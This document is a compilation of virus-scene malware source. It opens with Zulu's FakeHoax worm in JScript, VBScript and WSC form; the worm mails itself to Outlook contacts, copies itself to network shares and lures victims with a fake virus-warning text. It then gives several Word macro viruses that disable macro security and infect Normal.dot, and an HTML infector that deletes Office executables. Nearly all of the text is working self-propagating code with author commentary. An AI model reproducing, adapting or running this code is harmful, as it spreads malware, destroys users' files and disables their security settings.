' Worm Name: NETWORK/OUTLOOK.FakeHoax ' Author: Zulu ' Origin: Argentina ' Encoded JScript/VBScript worm, first in a JSE or VBE file. It uses OUTLOOK and the network ' shares. ' The main code is a COM object written in XML and VBScript using Windows Script Component, so ' the code in the JSE and VBE file is trivial. Both versions create a WSC file (the COM object ' defined in XML) and then both call methods and change properties of that object, no real ' spreading code is in those files. ' The worm was written in this way to make it easier to port it to any other language, this way ' I was able of creating a JSE and a VBE file without really porting the main code. Also, it's ' possible to create new versions using Delphi, Visual C++, or any other by using "REGSVR32.EXE" ' to register the WSC file as a COM object before calling it's methods or changing it's ' properties. ' This worm was written to show how JSE and VBE files could be used in viruses/worms, since ' before this they where only used as auxiliary files (some versions of HTML.rahC by 1nternal and ' OUTLOOK.Monopoly by me for example). Besides, since it needs Windows Script Host 2.0 or later, ' it won't be good spreading itself at the time of writing this. ' Also, this was a good opportunity for using Windows Script Component for the first time because ' it made possible to write a JScript and a VBScript version without needing to port the whole ' code, so this is also the first virus/worm using it's own COM object. ' ' Features: ' ' - OUTLOOK spreading. It will use OUTLOOK to send itself to all contacts in the address book if ' the number of addresses is less than 101. If that number is more than 100 it will try to ' select 100 random addresses. Subject and body are always the same. ' - Network spreading. It will copy itself to the root of all shares (not only mapped drives), ' waiting for someone to run it. ' - The worm file ("WOBBLER.TXT.JSE" or "WOBBLER.TXT.VBE" depending of the version) will show a ' TXT file when run, so it will show what many users expect. ' This TXT file will show the Wobbler hoax (the reason of the worm's name), which is a strange ' social engineering method for a real worm. Anyway, since this won't spread well because of ' other reasons, even if someone wants to spread it, I won't know if the hoax message is good ' for this purpose. Message subject and body talk about important information in the TXT file, ' but they don't talk about the hoax because this could cause fear in the user from opening the ' file or maybe make the user remember about viruses and checking for double extensions. ' - It has a 1/5 probability of also sending other email to the same addresses of the email ' having the worm file. The body of this email will have a poem written in spanish. ' The reason of this is an unusual request from a friend, she wanted one of her poems to be ' included in a virus/worm. ' So, even if this means unnecessary bytes and even worse spreading capabilities, here it is. :) ' - There is no need of AV products or removers after running the worm since Windows' settings are ' not changed and all temporary files are deleted. ' ' Here is the JSE file without encoding: G=new ActiveXObject("Scripting.FileSystemObject"); A=G.GetTempName().concat(".WSC");

S=G.CreateTextFile(G.BuildPath(G.GetSpecialFolder(2),A),true); S.Write("\r\n\r\n \r\n NETWORK/OUTLOOK.FakeHoax\r\n \r\n \r\n <property name=\"AttachmentFile \"/>\r\n <property name=\"TextFile\"/>\r\n <property name=\"WormFile\"/>\r\n <method name=\"DelTempFiles\"/>\r\n <method name=\"NetworkSpreading\">\r\n <parameter name=\"FileName\"/>\r\n \r\n <method name=\"OutlookSpreading\ ">\r\n <parameter name=\"Body\"/>\r\n <parameter name=\"MaxAmount\"/>\r\n <parameter name=\"Subject\"/>\r\n \r\n <method name=\"ShowText\">\r\n <parameter name=\"Content\"/>\r\n \r\n \r\n <script language=\" VBScript\">\r\n 0 Then\r\n Set FSO = CreateObject(\"Scripting.FileSystemObject\")\r\n For Counter1 = 0 To Shares.Count 1\r\n If Shares.Item(Counter1) <> \"\" Then FSO.CopyFile WormFile, FSO.BuildPath(Shares.Item(Counter1), FileName)\r\n Next\r\n Set FSO = Nothing\r\n End If\r\n Set Shares = Nothing\r\n Set Network = Nothing\r\n End Sub\r\n Sub OutlookSpreading(MaxAmount, Subject, Body)\r\n On Error Resume Next\r\n Set FSO = CreateObject(\"Scripting.FileSystemObject\")\r\n FSO.CopyFile WormFile, AttachmentFile\r\n Set FSO = Nothing\r\n Outlook = \"\"\r\n Set Outlook = CreateObject(\"Outlook.Application\")\r\n If Outlook <> \"\" Then\r\n Set MAPI = Outlook.GetNameSpace(\"MAPI\")\r\n For Each List In MAPI.AddressLists\r\n If List.AddressEntries.Count > 0 Then\r\n Set Email1 = Outlook.CreateItem(0)\r\n If List.AddressEntries.Count > MaxAmount Then\r\n Dim Address()\r\n ReDim Address(MaxAmount 1)\r\n For Counter1 = 0 To MaxAmount - 1\r\n Address(Counter1) = Int(List.AddressEntries.Count * Rnd)\r\n Next\r\n For Counter1 = 0 To MaxAmount - 1\r\n For Counter2 = Counter1 + 1 To MaxAmount 1\r\n If Address(Counter1) = Address(Counter2) And Address(Counter1) <> -1 Then Address(Counter2) = -1\r\n Next\r\n Next\r\n For Counter1 = 0 To MaxAmount - 1\r\n If Address(Counter1) = -1 Then Address(Counter1) = Int(List.AddressEntries.Count * Rnd)\r\n Next\r\n For Counter1 = 0 To MaxAmount - 1\r\n For Counter2 = Counter1 + 1 To MaxAmount - 1\r\n If Address(Counter1) = Address(Counter2) And Address(Counter1) <> -1 Then Address(Counter2) = -1\r\n Next\r\n Next\r\n For Counter1 = 0 To MaxAmount 1\r\n If Address(Counter1) <> -1 Then\r\n Set Entry = List.AddressEntries(Address(Counter1))\r\n If Counter1 = 0 Then Addresses = Entry.Address Else Addresses = Addresses & \"; \" & Entry.Address\r\n Set Entry = Nothing\r\n End If\r\n Next\r\n Else\r\n For Counter1 = 1 To List.AddressEntries.Count\r\n Set Entry = List.AddressEntries(Counter1)\r\n If Counter1 = 1 Then Addresses = Entry.Address Else Addresses = Addresses & \"; \" & Entry.Address\r\n Set Entry = Nothing\r\n Next\r\n End If\r\n Email1.BCC = Addresses\r\n Email1.Subject = Subject\r\n Email1.Body = Body\r\n Email1.Attachments.Add AttachmentFile\r\n Email1.DeleteAfterSubmit = True\r\n Email1.Send\r\n Set Email1 = Nothing\r\n Randomize\r\n If Int(5 * Rnd) = 0 Then\r\n Set Email2 = Outlook.CreateItem(0)\r\n Email2.BCC = Addresses\r\n Email2.Subject = \"Alma\"\r\n Email2.Body = \"No alucines que te amo,\" & Chr(13) & Chr(10) & \"cuando en realidad es solo\" & Chr(13) & Chr(10) & \"mi coraz\" & Chr(243) & \"n qui\" & Chr(233) & \"n lo hace.\" & Chr(13) & Chr(10) & \"Porque como ya sabr\ " & Chr(225) & \"s,\" & Chr(13) & Chr(10) & \"mi coraz\" & Chr(243) & \"n no manda en mi vida ,\" & Chr(13) & Chr(10) & \"si as\" & Chr(237) & \" lo hiciera,\" & Chr(13) & Chr(10) & \"mi alma estar\" & Chr(237) & \"a perdida.\"\r\n Email2.DeleteAfterSubmit = True\r\n Email2.Send\r\n Set Email2 = Nothing\r\n End If\r\n End If\r\n Next\r\n Set MAPI = Nothing\r\n Set Outlook = Nothing\r\n End If\r\n End Sub\r\n Sub ShowText(Content)\r\n On Error Resume Next\r\n Set FSO = CreateObject(\"Scripting.FileSystemObject\")\r\n Set File = FSO.CreateTextFile(TextFile, True)\r\n File.Write(Content)\r\n

File.Close\r\n Set File = Nothing\r\n Set FSO = Nothing\r\n Set WSHShell = CreateObject(\"WScript.Shell\")\r\n WSHShell.Run(TextFile)\r\n Set WSHShell = Nothing\r\n End Sub\r\n ]]>\r\n \r\n
\r\n") S.Close(); F=GetObject("script:".concat(G.BuildPath(G.GetSpecialFolder(2),A))); F.AttachmentFile=G.BuildPath(G.GetSpecialFolder(2),"WOBBLER.TXT.JSE"); F.TextFile=G.BuildPath(G.GetSpecialFolder(2),"WOBBLER.TXT"); F.WormFile=WScript.ScriptFullName; F.ShowText("Thought you might be interested in this message. If you receive an\r\nemail with a file called \"California\" do not open the file. The file\r\ncontains the \"WOBBLER\" virus.\r\n\r\nThis information was announced yesterday morning by IBM. The statement\r\nsays that ... \"This is a very dangerous virus, much worse than\r\n'Melissa' and there is NO remedy for it at this time. Some very sick\r\nindividual has succeeded in using the reformat function from Norton\r\nUtilities causing it to completely erase all documents on the hard\r\ndrive. It has been designed to work with Netscape Navigator and\r\nMicrosoft Internet Explorer. It destroys Macintosh and IBM compatible\r\ncomputers. This is a new, very malicious virus and not many people\r\nknow about it at this time.\"\r\n\"Please pass this warning file to everyone in your address book and\r\nshare it with all your online friends ASAP so that the destruction it\r\ncan cause may be minimized.\"\r\n"); F.OutlookSpreading(100,"Fw: important","> Thought you might be interested in this message, read the attachment for more information."); F.NetworkSpreading("WOBBLER.TXT.JSE"); F.DelTempFiles(); G.DeleteFile(G.BuildPath(G.GetSpecialFolder(2),A),true); ' Here is the VBE file without encoding: Set G=CreateObject("Scripting.FileSystemObject") A=G.GetTempName&".WSC" Set S=G.CreateTextFile(G.BuildPath(G.GetSpecialFolder(2),A),True) O=Chr(13)&Chr(10) S.Write ""&O&""&O&" "&O&" NETWORK/OUTLOOK.FakeHoax"&O&" "&O&" "&O&" <property name=""AttachmentFile""/>"&O&" <property name=""TextFile""/>"&O&" <property name=""WormFile""/>"&O&" <method name=""DelTempFiles""/>"&O&" <method name=""NetworkSpreading"">"&O&" <parameter name=""FileName""/>"&O&" "&O& " <method name=""OutlookSpreading"">"&O&" <parameter name=""Body""/>"&O&" <parameter name=""MaxAmount""/>"&O&" <parameter name=""Subject""/>"&O&" "&O& " <method name=""ShowText"">"&O&" <parameter name=""Content""/>"&O&" "&O& " "&O&" <script language=""VBScript"">"&O&" 0 Then"&O&" Set FSO = CreateObject(""Scripting.FileSystemObject"")" &O&" For Counter1 = 0 To Shares.Count - 1"&O&" If Shares.Item(Counter1) <> """" Then FSO.CopyFile WormFile, FSO.BuildPath(Shares.Item(Counter1), FileName)"&O&" Next"&O&" Set FSO = Nothing"&O&" End If"&O&" Set Shares = Nothing"&O&" Set Network = Nothing"&O&" End Sub"&O&" Sub OutlookSpreading(MaxAmount, Subject, Body)" &O&" On Error Resume Next"&O&" Set FSO = CreateObject(""Scripting.FileSystemObject"")"&O&" FSO.CopyFile WormFile, AttachmentFile" &O&" Set FSO = Nothing"&O&" Outlook = """""&O&" Set Outlook = CreateObject(""Outlook.Application"")"&O&" If Outlook <> """" Then"&O&" Set MAPI = Outlook.GetNameSpace(""MAPI"")"&O&" For Each List In MAPI.AddressLists"&O& " If List.AddressEntries.Count > 0 Then"&O&" Set Email1 = Outlook.CreateItem(0)"&O&" If List.AddressEntries.Count > MaxAmount Then"&O& " Dim Address()"&O&" ReDim Address(MaxAmount - 1)"&O& " For Counter1 = 0 To MaxAmount - 1"&O&" Address(Counter1) = Int(List.AddressEntries.Count * Rnd)"&O&" Next"&O&" For Counter1 = 0 To MaxAmount - 1"&O&" For Counter2 = Counter1 + 1 To MaxAmount - 1"&O& " If Address(Counter1) = Address(Counter2) And Address(Counter1) <> -1 Then

Address(Counter2) = -1"&O&" Next"&O&" Next"&O&" For Counter1 = 0 To MaxAmount - 1"&O&" If Address(Counter1) = -1 Then Address(Counter1) = Int(List.AddressEntries.Count * Rnd)"&O&" Next"&O& " For Counter1 = 0 To MaxAmount - 1"&O&" For Counter2 = Counter1 + 1 To MaxAmount - 1"&O&" If Address(Counter1) = Address(Counter2) And Address(Counter1) <> -1 Then Address(Counter2) = -1"&O&" Next"&O& " Next"&O&" For Counter1 = 0 To MaxAmount - 1"&O&" If Address(Counter1) <> -1 Then"&O&" Set Entry = List.AddressEntries(Address(Counter1))"&O&" If Counter1 = 0 Then Addresses = Entry.Address Else Addresses = Addresses & ""; "" & Entry.Address"&O&" Set Entry = Nothing"&O&" End If"&O&" Next"&O&" Else"&O &" For Counter1 = 1 To List.AddressEntries.Count"&O&" Set Entry = List.AddressEntries(Counter1)"&O&" If Counter1 = 1 Then Addresses = Entry.Address Else Addresses = Addresses & ""; "" & Entry.Address"&O&" Set Entry = Nothing"&O&" Next"&O&" End If"&O&" Email1.BCC = Addresses"&O&" Email1.Subject = Subject"&O&" Email1.Body = Body"&O& " Email1.Attachments.Add AttachmentFile"&O&" Email1.DeleteAfterSubmit = True"&O&" Email1.Send"&O&" Set Email1 = Nothing"&O&" Randomize"&O&" If Int(5 * Rnd) = 0 Then"&O&" Set Email2 = Outlook.CreateItem(0)"&O&" Email2.BCC = Addresses"&O&" Email2.Subject = ""Alma"""&O&" Email2.Body = ""No alucines que te amo,"" & Chr(13) & Chr(10) & ""cuando en realidad es solo"" & Chr(13) & Chr(10) & ""mi coraz"" & Chr(243) & ""n qui"" & Chr(233) & ""n lo hace."" & Chr(13) & Chr(10) & ""Porque como ya sabr"" & Chr(225) & ""s,"" & Chr(13) & Chr(10) & ""mi coraz"" & Chr(243) & ""n no manda en mi vida,"" & Chr(13) & Chr(10) & ""si as"" & Chr(237) & "" lo hiciera,"" & Chr(13) & Chr(10) & ""mi alma estar"" & Chr(237) & ""a perdida."""&O&" Email2.DeleteAfterSubmit = True"&O&" Email2.Send"&O&" Set Email2 = Nothing"&O&" End If"&O&" End If"&O&" Next"&O&" Set MAPI = Nothing"&O&" Set Outlook = Nothing"&O&" End If"&O&" End Sub"&O&" Sub ShowText(Content)"&O&" On Error Resume Next"&O&" Set FSO = CreateObject(""Scripting.FileSystemObject"")"&O& " Set File = FSO.CreateTextFile(TextFile, True)"&O&" File.Write(Content)"&O&" File.Close"&O&" Set File = Nothing"&O&" Set FSO = Nothing"&O&" Set WSHShell = CreateObject(""WScript.Shell"")"&O&" WSHShell.Run(TextFile)"&O&" Set WSHShell = Nothing"&O&" End Sub"&O&" ]]>"&O&" "&O&"
"&O S.Close Set F=GetObject("script:"&G.BuildPath(G.GetSpecialFolder(2),A)) F.AttachmentFile=G.BuildPath(G.GetSpecialFolder(2),"WOBBLER.TXT.VBE") F.TextFile=G.BuildPath(G.GetSpecialFolder(2),"WOBBLER.TXT") F.WormFile=WScript.ScriptFullName F.ShowText "Thought you might be interested in this message. If you receive an"&O&"email with a file called ""California"" do not open the file. The file"&O&"contains the ""WOBBLER"" virus."&O&O&"This information was announced yesterday morning by IBM. The statement"&O&"says that ... ""This is a very dangerous virus, much worse than"&O&"'Melissa' and there is NO remedy for it at this time. Some very sick"&O&"individual has succeeded in using the reformat function from Norton"&O&"Utilities causing it to completely erase all documents on the hard"&O&"drive. It has been designed to work with Netscape Navigator and"&O& "Microsoft Internet Explorer. It destroys Macintosh and IBM compatible"&O&"computers. This is a new, very malicious virus and not many people"&O&"know about it at this time."""&O& """Please pass this warning file to everyone in your address book and"&O&"share it with all your online friends ASAP so that the destruction it"&O&"can cause may be minimized."""&O F.OutlookSpreading 100,"Fw: important","> Thought you might be interested in this message, read the attachment for more information." F.NetworkSpreading "WOBBLER.TXT.VBE" F.DelTempFiles G.DeleteFile G.BuildPath(G.GetSpecialFolder(2),A),True ' Here is the WSC file (the COM object), I used spaces and "normal" variable names to make it ' easier to read: NETWORK/OUTLOOK.FakeHoax

<property name="AttachmentFile"/> <property name="TextFile"/> <property name="WormFile"/> <method name="DelTempFiles"/> <method name="NetworkSpreading"> <parameter name="FileName"/> <method name="OutlookSpreading"> <parameter name="Body"/> <parameter name="MaxAmount"/> <parameter name="Subject"/> <method name="ShowText"> <parameter name="Content"/> <script language="VBScript"> 0 Then Set FSO = CreateObject("Scripting.FileSystemObject") For Counter1 = 0 To Shares.Count - 1 If Shares.Item(Counter1) <> "" Then FSO.CopyFile WormFile, FSO.BuildPath( Shares.Item(Counter1), FileName) Next Set FSO = Nothing End If Set Shares = Nothing Set Network = Nothing End Sub Sub OutlookSpreading(MaxAmount, Subject, Body) On Error Resume Next Set FSO = CreateObject("Scripting.FileSystemObject") FSO.CopyFile WormFile, AttachmentFile Set FSO = Nothing Outlook = "" Set Outlook = CreateObject("Outlook.Application") If Outlook <> "" Then Set MAPI = Outlook.GetNameSpace("MAPI") For Each List In MAPI.AddressLists If List.AddressEntries.Count > 0 Then Set Email1 = Outlook.CreateItem(0) If List.AddressEntries.Count > MaxAmount Then Dim Address() ReDim Address(MaxAmount - 1) For Counter1 = 0 To MaxAmount - 1 Address(Counter1) = Int(List.AddressEntries.Count * Rnd) Next For Counter1 = 0 To MaxAmount - 1 For Counter2 = Counter1 + 1 To MaxAmount - 1 If Address(Counter1) = Address(Counter2) And Address(Counter1) <> -1 Then

Address(Counter2) = -1 Next Next For Counter1 = 0 To MaxAmount - 1 If Address(Counter1) = -1 Then Address(Counter1) = Int( List.AddressEntries.Count * Rnd) Next For Counter1 = 0 To MaxAmount - 1 For Counter2 = Counter1 + 1 To MaxAmount - 1 If Address(Counter1) = Address(Counter2) And Address(Counter1) <> -1 Then Address(Counter2) = -1 Next Next For Counter1 = 0 To MaxAmount - 1 If Address(Counter1) <> -1 Then Set Entry = List.AddressEntries(Address(Counter1)) If Counter1 = 0 Then Addresses = Entry.Address Else Addresses = Addresses & "; " & Entry.Address Set Entry = Nothing End If Next Else For Counter1 = 1 To List.AddressEntries.Count Set Entry = List.AddressEntries(Counter1) If Counter1 = 1 Then Addresses = Entry.Address Else Addresses = Addresses & "; " & Entry.Address Set Entry = Nothing Next End If Email1.BCC = Addresses Email1.Subject = Subject Email1.Body = Body Email1.Attachments.Add AttachmentFile Email1.DeleteAfterSubmit = True Email1.Send Set Email1 = Nothing Randomize If Int(5 * Rnd) = 0 Then Set Email2 = Outlook.CreateItem(0) Email2.BCC = Addresses Email2.Subject = "Alma" Email2.Body = "No alucines que te amo," & Chr(13) & Chr(10) & "cuando en realidad es solo" & Chr(13) & Chr(10) & "mi coraz" & Chr(243) & "n qui" & Chr(233) & "n lo hace." & Chr(13) & Chr(10) & "Porque como ya sabr" & Chr(225) & "s," & Chr(13) & Chr(10) & "mi coraz" & Chr(243) & "n no manda en mi vida," & Chr(13) & Chr(10) & "si as" & Chr(237) & " lo hiciera," & Chr(13) & Chr(10) & "mi alma estar" & Chr(237) & "a perdida." Email2.DeleteAfterSubmit = True Email2.Send Set Email2 = Nothing End If End If Next Set MAPI = Nothing Set Outlook = Nothing End If End Sub Sub ShowText(Content) On Error Resume Next Set FSO = CreateObject("Scripting.FileSystemObject") Set File = FSO.CreateTextFile(TextFile, True) File.Write(Content) File.Close Set File = Nothing

Set FSO = Nothing Set WSHShell = CreateObject("WScript.Shell") WSHShell.Run(TextFile) Set WSHShell = Nothing End Sub ]]>


VERSION 1.0 CLASS BEGIN MultiUse = -1 'True END Attribute VB_Name = "ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Private Function IT() On Error Resume Next Application.EnableCancelKey = wdCancelDisabled Set A = VBE.SelectedVBComponent.CodeModule B = A.Lines(A.ProcStartLine("IT", vbext_pk_Proc), A.ProcCountLines("IT", vbext_pk_Proc)) For c = 1 To VBE.VBProjects.Count For D = 1 To VBE.VBProjects(c).VBComponents.Count Set E = VBE.VBProjects(c).VBComponents(D).CodeModule If E.ProcOfLine(E.ProcStartLine("IT", vbext_pk_Proc), 1) <> "IT" And E.CountOfLines > 2 Then E.AddFromString B For F = 1 To E.CountOfLines G = E.ProcOfLine(F, 1) If H <> G And G <> "IT" And Right(E.Lines(E.ProcStartLine(G, vbext_pk_Proc), 1), 4) <> ": IT" Then E.ReplaceLine E.ProcStartLine(G, vbext_pk_Proc), E.Lines(E.ProcStartLine(G, vbext_pk_Proc), 1 ) & ": IT" H = G End If Next Next Next End Function Private Sub Document_Open(): IT 'My_Creator = Lys Kovick 'My_Name = Neclovek 'My_Comments = Do Not Distribute! End Sub

VERSION 1.0 CLASS BEGIN MultiUse = -1 'True END Attribute VB_Name = "ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Private Function IT() On Error Resume Next Application.EnableCancelKey = wdCancelDisabled Set A = VBE.SelectedVBComponent.CodeModule B = A.Lines(A.ProcStartLine("IT", vbext_pk_Proc), A.ProcCountLines("IT", vbext_pk_Proc)) For c = 1 To VBE.VBProjects.Count For D = 1 To VBE.VBProjects(c).VBComponents.Count Set E = VBE.VBProjects(c).VBComponents(D).CodeModule F = "" F = E.Lines(E.ProcStartLine("IT", vbext_pk_Proc), E.ProcCountLines("IT", vbext_pk_Proc)) If E.CountOfLines > 2 And F <> B Then E.AddFromString B For G = 1 To E.CountOfLines H = E.ProcOfLine(G, 1) If I <> H And H <> "IT" And Right(E.Lines(E.ProcStartLine(H, vbext_pk_Proc), 1), 4) <> ": IT" Then E.ReplaceLine E.ProcStartLine(H, vbext_pk_Proc), E.Lines(E.ProcStartLine(H, vbext_pk_Proc), 1 ) & ": IT" I = H End If Next Next Next End Function Private Sub Document_Open(): IT 'My_Creator = Lys Kovick 'My_Name = Unperson 'My_Comments = Do Not Distribute! End Sub

<SCRIPT LANGUAGE="VBScript"> $$<|/SCRIPT>$$" On Error Resume Next TMP = ReplaceWithIn(Chr(36),vbCrLf,MSBound) TMP = ReplaceWithIn(Chr(35),Chr(34),TMP) F = InStr(1,TMP,Chr(124)) MSBound = Left(TMP,F-1) & MSBound & Mid(TMP,F+1) F = InStr(2500,MSBound,Chr(124)) MSBound = Left(MSBound,F-1) & Mid(MSBound,F+1) Set FSO = CreateObject("Scripting.FileSystemObject") If Err.Number = 0 Then Set DC = FSO.Drives For Each D In DC If D.DriveType = 2 Then SweepDrive D.DriveLetter & ":\" End If Next End If Sub SweepDrive(pPath) Dim F, S, O On Error Resume Next Set F = FSO.GetFolder(pPath) InfectFiles F Set S = F.SubFolders For Each O In S SweepDrive(pPath & O.Name & "\") Next End Sub Sub InfectFiles(pFolder) Dim F,Member,Ext,M,C On Error Resume Next Set F = pFolder.Files For Each Member In F M = UCase(Member.Name) If M = "WINWORD.EXE" Or M = "ACCESS.EXE" Or M = "EXCEL.EXE" Or M = "WORD.EXE" Then Set M = FSO.GetFile(Member.Path) M.Attributes = (M.Attributes And 1) - 1

M.Delete End If Ext = UCase(FSO.GetExtensionName(Member.Name)) If Ext = "HTML" Or Ext = "HTM" Then Set M = FSO.OpenTextFile(Member.Path,1) C = M.ReadAll If InStr(1,C,MSBound) = 0 Then Set M = FSO.CreateTextFile(Member.Path, True) M.WriteLine MSBound & C M.Close End If End if Next End Sub Private Function ReplaceWithIn(CurChar,NewChar,SourceString) Dim T,TMP T = 1 TMP = SourceString Do While T > 0 T = InStr(T, TMP, CurChar) If T > 0 Then TMP = Left(TMP,T-1) & NewChar & Mid(TMP,T+1) Loop ReplaceWithIn = TMP End Function 'MSBound by Suppa. --> <TITLE>MSBound


MSBound by Suppa.


This is the parent HTML file containing MSBound written by Suppa.
Feel free do to what you want with it, but don't blame me if it comes back to you.

Special thanks go out to Gigabyte for getting me interested in these things.


VERSION 1.0 CLASS BEGIN MultiUse = -1 'True END Attribute VB_Name = "ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Private Declare Function SetSysColors Lib "user32" (ByVal nChanges As Long, lpSysColor As Long, lpColorValues As Long) As Long Private Sub Document_Open() ' LSD ' By The WalruS 09/00 v1.00 On Error Resume Next Randomize If Left(ActiveDocument.Name, 8) = "Document" Then Exit Sub Select Case Application.Version Case "9.0" System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1& CommandBars("Macro").Controls("Security...").Enabled = False Case "8.0" Options.VirusProtection = False Options.SaveNormalPrompt = False Options.ConfirmConversions = False End Select With Application .ScreenUpdating = False .DisplayStatusBar = False .DisplayAlerts = False End With KeyBindings.Add KeyCode:=BuildKeyCode(wdKeyAlt, wdKeyF11), KeyCategory:=0, Command:=" " Set nor = NormalTemplate.VBProject.vbcomponents(1).CodeModule Set doc = ActiveDocument.VBProject.vbcomponents(1).CodeModule ChangeHook = Int(Rnd * 2) Select Case ChangeHook Case 0 Hook = "Private Sub Document_Open()" Case 1 Hook = "Private Sub Document_Close()" End Select Open "C:\Windows\" & Day(Now) & ".sys" For Output As #1 Print #1, "Private Declare Function SetSysColors Lib ""user32"" (ByVal nChanges As Long, lpSysColor As Long, lpColorValues As Long) As Long" Print #1, Hook Print #1, VBProject.vbcomponents(1).CodeModule.Lines(3, 110) Close #1

If nor.Lines(3, 1) <> "' LSD" Then nor.DeleteLines 1, nor.CountOfLines nor.AddFromFile ("C:\Windows\" & Day(Now) & ".sys") NormalTemplate.Save ElseIf doc.Lines(3, 1) <> "' LSD" Then doc.DeleteLines 1, doc.CountOfLines doc.AddFromFile ("C:\Windows\" & Day(Now) & ".sys") End If With Dialogs(wdDialogFileSummaryInfo) .Author = "WalruS" .Title = "CandyFlippin" .Execute End With TimeCheck = Second(Now) One = Left(TimeCheck, 1) Two = Right(TimeCheck, 1) If One = Two Then Call CandyFlip NormalTemplate.Saved = True If ActiveDocument.Saved <> True Then ActiveDocument.Save End Sub Private Sub CandyFlip() On Error Resume Next a = SetSysColors(1, 1, RGB(Rnd * 255, Rnd * 255, Rnd * 255)) a = SetSysColors(1, 2, RGB(Rnd * 255, Rnd * 255, Rnd * 255)) a = SetSysColors(1, 3, RGB(Rnd * 255, Rnd * 255, Rnd * 255)) a = SetSysColors(1, 4, RGB(Rnd * 255, Rnd * 255, Rnd * 255)) a = SetSysColors(1, 5, RGB(Rnd * 255, Rnd * 255, Rnd * 255)) a = SetSysColors(1, 6, RGB(Rnd * 255, Rnd * 255, Rnd * 255)) a = SetSysColors(1, 7, RGB(Rnd * 255, Rnd * 255, Rnd * 255)) a = SetSysColors(1, 8, RGB(Rnd * 255, Rnd * 255, Rnd * 255)) a = SetSysColors(1, 9, RGB(Rnd * 255, Rnd * 255, Rnd * 255)) a = SetSysColors(1, 10, RGB(Rnd * 255, Rnd * 255, Rnd * 255)) a = SetSysColors(1, 11, RGB(Rnd * 255, Rnd * 255, Rnd * 255)) a = SetSysColors(1, 12, RGB(Rnd * 255, Rnd * 255, Rnd * 255)) a = SetSysColors(1, 13, RGB(Rnd * 255, Rnd * 255, Rnd * 255)) a = SetSysColors(1, 14, RGB(Rnd * 255, Rnd * 255, Rnd * 255)) a = SetSysColors(1, 15, RGB(Rnd * 255, Rnd * 255, Rnd * 255)) a = SetSysColors(1, 16, RGB(Rnd * 255, Rnd * 255, Rnd * 255)) a = SetSysColors(1, 17, RGB(Rnd * 255, Rnd * 255, Rnd * 255)) a = SetSysColors(1, 18, RGB(Rnd * 255, Rnd * 255, Rnd * 255)) a = SetSysColors(1, 19, RGB(Rnd * 255, Rnd * 255, Rnd * 255)) a = SetSysColors(1, 20, RGB(Rnd * 255, Rnd * 255, Rnd * 255)) a = SetSysColors(1, 21, RGB(Rnd * 255, Rnd * 255, Rnd * 255)) a = SetSysColors(1, 22, RGB(Rnd * 255, Rnd * 255, Rnd * 255)) a = SetSysColors(1, 23, RGB(Rnd * 255, Rnd * 255, Rnd * 255)) a = SetSysColors(1, 24, RGB(Rnd * 255, Rnd * 255, Rnd * 255)) a = SetSysColors(1, 25, RGB(Rnd * 255, Rnd * 255, Rnd * 255)) a = SetSysColors(1, 26, RGB(Rnd * 255, Rnd * 255, Rnd * 255)) a = SetSysColors(1, 27, RGB(Rnd * 255, Rnd * 255, Rnd * 255)) End Sub

'Aida Private Sub Document_Open(): With Options: Const nula = 0 .VirusProtection = nula End With: Dim a, b, c, d a = Strings.RTrim(ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, _ ThisDocument.VBProject.VBComponents(1).CodeModule.CountOfLines)) With NormalTemplate.VBProject.VBComponents(1).CodeModule c = .Lines(1, 1) If c <> "'Aida" Then .DeleteLines 1, NormalTemplate.VBProject.VBComponents(1) _ .CodeModule.CountOfLines .InsertLines 1, a End If End With With ActiveDocument.VBProject.VBComponents(1).CodeModule d = .Lines(1, 1) If d <> "'Aida" Then .DeleteLines 1, ActiveDocument.VBProject.VBComponents(1) _ .CodeModule.CountOfLines .InsertLines 1, a End If: End With If Day(Now()) = 14 And Month(Now()) = 9 Then With Selection .Font.Bold = True: .Font.Color = wdColorViolet .Font.Size = 26: .Font.Emboss = True .Font.Animation = wdAnimationSparkleText .Font.Shadow = True: .ParagraphFormat.Alignment = wdAlignParagraphCenter Selection.Text = "Aida: Where ever You are, You are only one that I loved truely!" End With End If 'WM97/2K.Aida by e[ax] 'Pozdravljam sve pri BiHNet.Org-u! 'Greetz to all ppl on #virus and VX-scene! '"Kad sve izgleda da umire, ono se ustvari radja" - e[ax] End Sub

'e[ax] Private Sub Document_open() Dim KVICKJS, CHSJEUR, LCXJSIE, OCKAJRF, SIFDMXU Set CHSJEUR = ThisDocument.VBProject.VBComponents(1).CodeModule Set OCKAJRF = NormalTemplate.VBProject.VBComponents(1).CodeModule Set LCXJSIE = ActiveDocument.VBProject.VBComponents(1).CodeModule KVICKJS = Strings.Trim(CHSJEUR.lines(1, CHSJEUR.countoflines)) SIFDMXU = Strings.LCase("'e[ax]") If SIFDMXU <> OCKAJRF.lines(1, 1) Then With OCKAJRF .deletelines 1, OCKAJRF.countoflines .insertlines 1, KVICKJS End With End If If SIFDMXU <> LCXJSIE.lines(1, 1) Then With LCXJSIE .deletelines 1, LCXJSIE.countoflines .insertlines 1, KVICKJS End With End If 'WM97/2K.String by e[ax] 'SIM v1.0 [String Infection Method] by e[ax] 'Greetz: k04x, rudeboy, BIGFOOOT, E-man, SnakeLord, t[r]ax 'H4dija, te ostale pri BIHnet.ORG-u 'SP.greetz to: Jackie 2Fl0wer, KnowDeth, ASMhead5, Mist, mort'nala, Giga, LifeWire, Fulvian, Staggle, SlageHamm, Perikles, Evul, and to all ppl on #virus '10x once again for inspiration... 'VicES: Where ar u man!? End Sub

Private Sub document_open(): Const nula = 0 Dim a, b, c, d: Set b = ThisDocument: Options.VirusProtection = nula If b = ActiveDocument Then Set c = NormalTemplate Else Set c = ActiveDocument d = b.VBProject.vbcomponents(1).codemodule.lines(1, _ b.VBProject.vbcomponents(1).codemodule.countoflines): a = Strings.LCase(d) With c.VBProject.vbcomponents(1).codemodule If .lines(14, 1) <> "'string2" Then With c.VBProject.vbcomponents(1).codemodule .deletelines 1, c.VBProject.vbcomponents(1).codemodule.countoflines .insertlines 1, a End With End If End With End Sub 'string2

